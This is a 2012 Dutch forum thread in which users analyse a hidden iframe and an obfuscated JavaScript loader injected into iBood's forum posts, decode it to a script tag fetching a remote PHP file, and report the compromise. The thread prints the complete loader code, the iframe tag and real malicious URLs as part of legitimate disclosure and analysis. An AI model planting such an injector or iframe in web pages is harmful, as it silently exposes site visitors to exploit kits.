Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Verdacht Javascript iBood?

Pagina: 1
Acties:

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Deze site wordt via een iframe geladen op de paginas van het ibood forum. Vanaf 19-9 staat er ineens deze code in de denk ik template die ibood gebruikt voor hun openingsposts.

<iframe style="width:1px;height: 1px" src="http://nl.effes.net/uh09325.htm"></iframe>

Ik weet niet of het opzet van ibood is maar het ziet er verdacht uit... Ook omdat er een aantal meldingen gedaan werden van een melding van het antivirus programma waneer mensen op het ibood forum browsen.
Ik heb zelf ook eenmalig een melding ontvangen:

24-9-2012 15:03:02 Web Attack: Malicious JAR File Download kj297c279fwq.getmyip.com:1342/images/1/668db76b2e66a75f99fdb9b583d5d526/674263890/439bb521f5b75d98f70f1791937cd46a.jar1 Web Attack: Malicious JAR File Download 6 attack blocked. Traffic has been blocked for this application: \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE

Daarna niet meer het lijkt random te gaan

Die htm file
code:
1
http://nl.effes.net/uh09325.htm
bevat onderstaand js script

code:
1
2
3
4
5
6
7
8
9
<script> 
function g_d(c,d,n,s,u){var a=d[c][s](n+"=");if(a[1]){return u(a[1][s](';')[0]);}return null;}
function s_p(c,d,n,v,e,s,o,u){var t;t=new Date();t[o](t[u]()+7);d[c]=n+"="+e(v)+';expires='+t[s]()+';path=/';}
function i_a(d,w,f,s,l){for(i=0;i<l.length;i++){d[w](s[f](l[i]));}}
function s_d(u,v,w,x,y,z,a,b,c,d,e){var nD=new Date();nD[x](nD[z]()+7);nD[y]();v[u][w]('nD', nD);i_a(a,b,c,d,e);}
function l_s(a,b,c,d,e,f,g,h,i,j,k,l,m){if(b[a][g]('nD')){sD=b[a][g]('nD');var s=Date[f](sD);var cD=new Date();cD[e]();var c=Date[f](cD);m=24*60*60*1000;r=(s-c)/m;r=Math.round(r);if (r<0){s_d(a,b,c,d,e,h,i,j,k,l,m);}}else {s_d(a,b,c,d,e,h,i,j,k,l,m);}}
function i_s(){var t=new Array('getElementById','fromCharCode','body','removeChild','write',document,'cookie','split','createElement','join','getElementsByName','getElementsByTagName',String,unescape,escape,'localStorage',window,'setItem','setDate','toGMTString','parse','getItem','getDate','setUTCDate','getUTCDate');var s=new Array(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,110,108,46,101,102,102,101,115,46,110,101,116,47,105,46,112,104,112,39,62,60,47,115,99,114,105,112,116,62);if(t[16][t[15]]){l_s(t[15],t[16],t[17],t[18],t[19],t[20],t[21],t[22],t[5],t[4],t[1],t[12],s);}else if(!g_d(t[6],t[5],t[2],t[7],t[13])){s_p(t[6],t[5],t[2],t[2],t[14],t[19],t[23],t[24]);i_a(t[5],t[4],t[1],t[12],s);}}
i_s();
</script>


Een gedeelde kan ik omzetten naar een pagina die hij wil openen:
code:
1
(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,110,108,46,101,102,102,101,115,46,110,101,116,47,105,46,112,104,112,39,62,60,47,115,99,114,105,112,116,62)


Het bovenstaande is gelijk aan: <script src='http://nl.effes.net/i.php'></script>

Deze php file bevat volgens mij verder niets..

Waar ik benieuwd naar ben in wat de rest betekend. Heb verder totaal geen JS ervaring. Mischien is het wel niets maar ik vond het wel interessant..

if(t[16][t[15]]){l_s(t[15],t[16],t[17],t[18],t[19],t[20],t[21],t[22],t[5],t[4],t[1],t[12],s);}else if(!g_d(t[6],t[5],t[2],t[7],t[13])){s_p(t[6],t[5],t[2],t[2],t[14],t[19],t[23],t[24]);i_a(t[5],t[4],t[1],t[12],s);}}

Afbeeldingslocatie: http://i.imgur.com/Q0kst.jpg

  • storeman
  • Registratie: April 2004
  • Laatst online: 19:46
Heb je bij iBood al een melding gedaan?

"Chaos kan niet uit de hand lopen"


  • TripleQ
  • Registratie: Juni 2004
  • Niet online
Als je naar http://nl.effes.net/ toe gaat
Toegang via effes.net geblokkeerd in verband met verdachte activiteiten.

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Ja ook gezien daarom...

Ja via zon formulier op hun site 1,5 dag terug al maar geen reactie...

[ Voor 9% gewijzigd door Lucaz op 26-09-2012 11:18 ]


  • Room42
  • Registratie: September 2001
  • Niet online
Ik vind het inderdaad verdacht en ze staan bij mij vast in de blacklist van adblock.

"Technological advancements don't feel fun anymore because of the motivations behind so many of them." Bron


  • TripleQ
  • Registratie: Juni 2004
  • Niet online
En het domain staat op naam van één of andere rus

[ Voor 15% gewijzigd door TripleQ op 26-09-2012 11:18 ]


  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
19-9 is ook de dag dat die laatste hunt begon.. Veel mensen op het forum..

  • Patriot
  • Registratie: December 2004
  • Laatst online: 18:46

Patriot

Fulltime #whatpulsert

Het script kijkt eerst of er opgeslagen kan worden in de localStorage. Daarin heeft hij (als de pagina met het script eerder is bezocht) een datum in opgeslagen (het moment van opslaan + 7 dagen), zodat het script maar eens in de zeven dagen wordt aangeroepen. Dan schrijft hij dus inderdaad die string die je zelf al had gevonden, zodat dat script wordt aangeroepen (daar heeft op een gegeven moment waarschijnlijk iets in gestaan, want anders had je die melding van je virusscanner niet gehad).

Er zit ook nog een fallback in naar cookies, waarschijnlijk voor oudere browsers. Overigens werkt de aanval bij nieuwere browsers slechts 1 keer, omdat hij door een bug bij terugkerende bezoeken niet meer de verwijzing naar i.php print. Verder zitten er nog wat loze verwijzingen naar toGMTString() in.

Ik denk dat je er dus vanuit kunt gaan dat iBood geïnfecteerd is (geweest). Heb je hierover al contact opgenomen met iBood?

  • TripleQ
  • Registratie: Juni 2004
  • Niet online
De aanbieding vandaag (productpagina) bevat ook het stukje code, dus als ze geïnfecteerd waren, dan zijn ze dat nog steeds

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Ja inderdaad dit is al minimaal een week elke dag opnieuw aan de gang bij elke nieuwe forum post..

@Patriot Heb ibood een mail gestuurd via hun contact forum op de site maar nog geen reactie.. Thx voor de uitleg. Ziet er dan inderdaad neit best uit aangezien de aanvaller via dat iframe op elk moment weer wat anders kan laden.

[ Voor 28% gewijzigd door Lucaz op 26-09-2012 12:14 ]


Verwijderd

http://nl.effes.net/ werkt nu wel overigens. Misschien in de mail vermelden dat je ibood.com anders laat blacklisten? dit is binnen 24 uur geregeld als je de website op google aanmeld. dan zijn ze verplicht te handelen

  • TripleQ
  • Registratie: Juni 2004
  • Niet online
Ik zie nog steeds de melding dat de site is geblokkeerd vanwege verdachte activiteiten...

Verwijderd

Melding verzonden

Hartelijk dank voor uw melding aan Google. Nu u uw goede daad voor vandaag heeft verricht, kunt u:

1. Even de tijd nemen om er trots op te zijn dat u meehelpt internet veiliger te maken.

2. Ervoor zorgen dat u uw webbrowser heeft bijgewerkt naar de nieuwste versie, en dat u de nieuwste patches heeft geïnstalleerd voor uw besturingssysteem.

3. Meer lezen over malware die uw computer kan infecteren op Stopbadware.org.

Voila

~
Heeft iemand ook de malicious paginas van ibood? Ik ben nu de aangegeven pagina's aan het testen in een virtuele omgeving ( de links van vorige posts ).

Updates komen in dit bericht

[ Voor 16% gewijzigd door Verwijderd op 26-09-2012 12:18 ]


  • Patriot
  • Registratie: December 2004
  • Laatst online: 18:46

Patriot

Fulltime #whatpulsert

Als ik het goed begrijp zijn alle forumposts betreffende producten/de hunt geïnfecteerd.

EDIT: lijkt me niet echt praktisch om iBood als malicious te reporten.

[ Voor 31% gewijzigd door Patriot op 26-09-2012 12:17 ]


  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Patriot schreef op woensdag 26 september 2012 @ 12:17:
Als ik het goed begrijp zijn alle forumposts betreffende producten/de hunt geïnfecteerd.
De startposts vanaf 19-9 zijn allemaal infected idd.. In de post van 18-9 bijv en eerder zit die iframe er niet in..

Verwijderd

De malware schijnt nu van de desbetreffende i.php / .htm verwijderd te zijn. ik heb de genoemde pagina's in een virtuele win7 en xp getest

De whois van het domein:
egistrant:
N/A
Oleg V Shevchenko ()
Bolshaya morskaya 18 kv 30
Sevastopol
Kiev Oblast,220022
UA
Tel. +7.4951111111

Wat ik echter wel grappig vind, is dat http://nl.effes.net/ doorverwijst naar een nederlandse webshop. maar effes.net niet werkt ( bij mij ) :+

[ Voor 84% gewijzigd door Verwijderd op 26-09-2012 12:29 ]


  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Verwijderd schreef op woensdag 26 september 2012 @ 12:27:
De malware schijnt nu van de desbetreffende i.php / .htm verwijderd te zijn. ik heb de genoemde pagina's in een virtuele win7 en xp getest
Idd die i.php lijkt nu leeg te zijn.. Maar toch de aanvaller kan er elk moment weer wat inzetten of een andere file laten laden..
En aan mijn av melding te zien stond er een paar dagen terug nogwel wat in..

[ Voor 9% gewijzigd door Lucaz op 26-09-2012 12:30 ]


  • Patriot
  • Registratie: December 2004
  • Laatst online: 18:46

Patriot

Fulltime #whatpulsert

Nouja, effes.net, het domein waarvan i.php werd geserveerd (die waarschijnlijk verder verantwoordelijk was voor het daadwerkelijke infecteren) lijkt offline, maar het htmlbestand is nog gewoon aanwezig (inclusief javascript). Het i.php bestand lijkt op het eerste gezicht niets te doen. Het is verder gewoon vreemd dat het iframe nog in de code staat bij iBood.

EDIT: spuit 11 :z

[ Voor 3% gewijzigd door Patriot op 26-09-2012 12:30 ]


  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
BTW die
code:
1
http://nl.effes.net/i.php
staat op nog 2 websites (als je in de source kijkt) die dan mss ook wel gehackt zijn..

code:
1
2
http://www.ibannl.org/
http://bevrijdingspop.nl/

[ Voor 6% gewijzigd door Lucaz op 26-09-2012 13:23 ]


Verwijderd

Zojuist antwoord van iBood ontvangen:
Beste heer XXXXXX,

Hartelijk dank voor uw bericht.

We hebben uw email doorgezet naar onze afdeling IT.
Mochten zij nog vragen hebben zal er contact met u worden opgenomen.

Wij wensen u een prettige dag!


Met vriendelijke groet,

iBOOD Customer Service

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Verwijderd schreef op woensdag 26 september 2012 @ 13:24:
Zojuist antwoord van iBood ontvangen:
Beste heer XXXXXX,

Hartelijk dank voor uw bericht.

We hebben uw email doorgezet naar onze afdeling IT.
Mochten zij nog vragen hebben zal er contact met u worden opgenomen.

Wij wensen u een prettige dag!


Met vriendelijke groet,

iBOOD Customer Service
Mmm vaag heb jij ook contact opgenomen via dat contact form op hun site of niet? Want ik heb geen reactie gekregen..

Verwijderd

Ja gewoon via hun contact fomulier.

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Vaag maar ok.. Eens kijken hoesnel ze de code weghalen. En belangrijker hoe die code erop is gekomen..

[ Voor 4% gewijzigd door Lucaz op 26-09-2012 14:04 ]


Verwijderd

Ach, ik heb in de mail gezet dat ik alle partijen betreffende de javascript code op de malware list van google heb toegevoegd. misschien dat ze daarom reageerden?

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Verwijderd schreef op woensdag 26 september 2012 @ 13:31:
Ach, ik heb in de mail gezet dat ik alle partijen betreffende de javascript code op de malware list van google heb toegevoegd. misschien dat ze daarom reageerden?
Haha idd jou bericht was wss iets dringender ;)

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Ah heb nu ook een mail van ibood terug. Dat het doorgezet is naar de juiste personen..

  • Thralas
  • Registratie: December 2002
  • Laatst online: 15:20
Het lijkt er inderdaad op dat iBood (en anderen) compromised zijn, waardoor er een exploit(kit) werd geserveerd.

Misschien verstandig om de urls in de TS even te voorzien van een waarschuwing - je wilt er niet heen browsen met een out-of-data Javaplugin ;)

  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Ibood heeft hem uit de pagina van vandaag gehaald :) Nog niet uit de oudere posts.

[ Voor 34% gewijzigd door Lucaz op 26-09-2012 14:41 ]


Verwijderd

Lucaz schreef op woensdag 26 september 2012 @ 14:33:
Ibood heeft hem uit de pagina van vandaag gehaald :) Nog niet uit de oudere posts.
Dit had ik ook geconstateerd :9 Het is lastig voor de bezoekers dat iBood geen informatie/blog/nieuws pagina heeft. Maar op iBood kom ik niet meer met mijn privé computer.. dit hebben ze nu mooi verprutst

  • winkbrace
  • Registratie: Augustus 2008
  • Laatst online: 23-11 10:43
Goed gespot, hoor TS. d:)b

  • Dimitri R
  • Registratie: Februari 2007
  • Laatst online: 14-02 03:18
Inmiddels zijn alle kwaadaardige links verwijderd volgens iBood. Er zou gebruik zijn gemaakt van een beveiligingsgat in de forumsoftware. Dit gat zou gedicht zijn. zie updates op nieuws: Forum iBood linkt naar verdachte code - update 2

Abort Retry Fail?


Verwijderd

Dat is goed om te horen! Nu maar hopen dat de medewerkers van de 'IT Afdeling' een lesje hebben geleerd. Want een out-of-date forum software is zo 2011

[ Voor 27% gewijzigd door Verwijderd op 26-09-2012 16:05 ]


  • Lucaz
  • Registratie: Juni 2002
  • Laatst online: 17-11 22:33

Lucaz

Ondertiteling

Topicstarter
Verwijderd schreef op woensdag 26 september 2012 @ 16:04:
Dat is goed om te horen! Nu maar hopen dat de medewerkers van de 'IT Afdeling' een lesje hebben geleerd. Want een out-of-date forum software is zo 2011
Mee eens ;)

  • baskr1
  • Registratie: April 2010
  • Laatst online: 31-01 19:29
Afbeeldingslocatie: http://imageshack.us/a/img534/7841/virusdy.jpg

Vandaag AVG eroverheen laten gaan, doe ie standaard elke 2 dagen, en bij de scan kwamen de volgende dingen naar boven.. Nu ben ik 24 en 25 september daar op het forum geweest.. denken jullie dat ik me zorgen moet maken?

  • Patriot
  • Registratie: December 2004
  • Laatst online: 18:46

Patriot

Fulltime #whatpulsert

baskr1 schreef op donderdag 27 september 2012 @ 10:56:
[afbeelding]

Vandaag AVG eroverheen laten gaan, doe ie standaard elke 2 dagen, en bij de scan kwamen de volgende dingen naar boven.. Nu ben ik 24 en 25 september daar op het forum geweest.. denken jullie dat ik me zorgen moet maken?
Je hebt een website bezocht die besmet was, je hebt bestanden op je PC gehad die besmet waren. Die laatste zijn nu verwijderd, maar misschien zijn er nog niet ontdekte bestanden. Het is niet uit te sluiten en niet te bevestigen. Als je zekerheid wilt moet je gewoon je OS opnieuw installeren, je kunt het ook afwachten, maar de gevolgen zijn voor jezelf.

  • Caelorum
  • Registratie: April 2005
  • Laatst online: 18:48
Patriot schreef op vrijdag 28 september 2012 @ 05:04:
[...] Als je zekerheid wilt moet je gewoon je OS opnieuw installeren, je kunt het ook afwachten, maar de gevolgen zijn voor jezelf.
En dan nog heb je de zekerheid niet. Zelfs als je een pc koopt tegenwoordig ben je het niet meer zeker, omdat ze het zelfs in de fabriek er al op proberen te zetten.

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 20-11 11:59

NMe

Quia Ego Sic Dico.

Zullen we dit maar in Beveiliging & Virussen zetten? Want met programmeren heeft het niet veel te maken...

PRG>>BV

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

Pagina: 1